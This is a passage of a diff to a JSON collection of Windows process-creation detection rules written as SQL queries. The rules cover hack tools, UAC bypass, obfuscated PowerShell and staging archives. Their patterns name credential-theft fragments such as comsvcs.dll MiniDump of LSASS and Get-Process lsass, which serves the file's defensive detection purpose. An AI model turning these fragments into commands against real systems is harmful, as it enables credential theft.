password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% --dumpType Full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": "proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": 
"7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "status": "experimental", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "title": "UAC Bypass 
Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. 
The rule limits the search to specific extensions and directories to avoid FPs\n", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + 
"filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine 
LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "title": "Phishing 
Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. 
Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript 
blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", + "attack.defense_evasion", "attack.t1059.001", + "attack.t1027" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" + }, + { + "title": "New Root Certificate 
Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1553.004" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious 
activity", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + 
"attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", - "author": "Sreeman", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' 
